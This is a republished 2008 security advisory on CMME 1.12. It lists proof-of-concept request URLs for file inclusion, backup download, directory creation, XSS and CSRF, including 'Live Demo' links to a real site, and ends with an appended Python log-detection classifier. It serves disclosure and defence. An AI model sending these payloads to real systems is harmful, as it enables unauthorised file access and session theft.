Bug: CMME 1.12 (LFI/XSS/CSRF/Backup/MkDir) Multiple Vulnerabilities


Published: 2008.09.07
Credit: SirGod
Risk: Medium
CWE: CWE-79, CWE-264, CWE-352, CWE-22
CVE: CVE-2008-3923, CVE-2008-3924, CVE-2008-3925, CVE-2008-3926
Local: No
Remote: Yes

##################################################################################################################
[+] CMME 1.12 (LFI/XSS/CSRF/Download Backup/MkDir) Multiple Remote Vulnerabilities
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN,kemrayz
##################################################################################################################

[+] Local File Inclusion

Note : magic_quotes_gpc must be off.

Example :

http://localhost/index.php?page=weblog&env=[Local File]%00

PoC :

http://localhost/index.php?page=weblog&env=../../../autoexec.bat%00


[+] Download Backup

Example 1:

http://localhost/backup/[Backup Name].zip

PoC 1:

http://localhost/backup/cmme_data.zip

Live Demo 1:

http://cmme.oesterholt.net/backup/cmme_data.zip

Example 2:

http://localhost/backup/[Backup Name].zip

PoC 2:

http://localhost/backup/cmme_cmme.zip

Live Demo 2:

http://cmme.oesterholt.net/backup/cmme_cmme.zip


[+] Make Directory

You can create multiple directories in the website root folder.

Example 1:

http://localhost/admin.php?action=login&page=home&script=index.php&env=[Directory]

PoC 1:

http://localhost/admin.php?action=login&page=home&script=index.php&env=!!!Owned!!!


Or you can create a directory in the parent directory, etc.

Example 2:

http://localhost/admin.php?action=login&page=home&script=index.php&env=../[Directory]

PoC 2:

http://localhost/admin.php?action=login&page=home&script=index.php&env=../!!!Owned!!!


[+] Cross Site Scripting

Example 1:

http://localhost/statistics.php?action=hstat_year&page=[XSS]&env=data

PoC 1:

http://localhost/statistics.php?action=hstat_year&page=<script>alert(document.cookie)</script>&env=data

Live Demo 1:

http://cmme.oesterholt.net/statistics.php?action=hstat_year&page=<script>alert(document.cookie)</script>&env=data

Example 2:

http://localhost/statistics.php?action=hstat_year&year=[XSS]&env=data

PoC 2:

http://localhost/statistics.php?action=hstat_year&year=<script>alert(document.cookie)</script>&env=data

Live Demo 2:

http://cmme.oesterholt.net/statistics.php?action=hstat_year&year=<script>alert(document.cookie)</script>&env=data


[+] Cross Site Request Forgery

If a logged-in user with administrator privileges clicks the following link, he will be logged out.

http://localhost/admin.php?action=logout&page=home&env=data


##################################################################################################################
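
The request patterns listed above can be matched in web-server access logs. The following Python classifier is an added example, not part of the original advisory or of CMME; the sample requests are constructed, and it assumes that legitimate env values are plain names such as "data" and that the site host is localhost.

```python
import re
from urllib.parse import urlsplit, parse_qs

SAFE_ENV = re.compile(r"[A-Za-z0-9_-]+")  # assumption: legitimate env values look like "data"
BACKUP_ZIP = re.compile(r"/backup/[^/]+\.zip", re.IGNORECASE)

def classify(target, referer_host=None, site_host="localhost"):
    """Return sorted labels for the advisory issues one request target matches."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)  # values are percent-decoded
    script = parts.path.rsplit("/", 1)[-1]
    action = params.get("action", [""])[0]
    hits = set()
    for env in params.get("env", []):
        if not SAFE_ENV.fullmatch(env):
            # Per the advisory: index.php includes a file named by env,
            # admin.php creates a directory named by env.
            hits.add({"index.php": "lfi", "admin.php": "mkdir"}.get(script, "env-tamper"))
    if BACKUP_ZIP.fullmatch(parts.path):
        hits.add("backup-download")
    if script == "statistics.php":
        for name in ("page", "year"):
            if any(re.search(r"[<>\"']", v) for v in params.get(name, [])):
                hits.add("xss")
    # Logout requested from another site's page (Referer host differs from ours).
    if script == "admin.php" and action == "logout" and referer_host not in (None, site_host):
        hits.add("csrf-logout")
    return sorted(hits)

# Constructed sample requests: (request target, Referer host or None).
SAMPLES = [
    ("/index.php?page=weblog&env=data", None),
    ("/index.php?page=weblog&env=../../../autoexec.bat%00", None),
    ("/backup/cmme_data.zip", None),
    ("/admin.php?action=login&page=home&script=index.php&env=../newdir", None),
    ("/statistics.php?action=hstat_year&year=%3Cscript%3Ex%3C/script%3E&env=data", None),
    ("/admin.php?action=logout&page=home&env=data", "other.example"),
    ("/admin.php?action=logout&page=home&env=data", "localhost"),
]

def scan(samples=SAMPLES):
    """Return (target, labels) for every sample request that matched something."""
    return [(t, classify(t, r)) for t, r in samples if classify(t, r)]

if __name__ == "__main__":
    for target, labels in scan():
        print(",".join(labels), target)
```
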

References:

http://xforce.iss.net/xforce/xfdb/44685
http://www.securityfocus.com/bid/30854
http://www.milw0rm.com/exploits/6313
http://secunia.com/advisories/31599

Copyright 2014, cxsecurity.com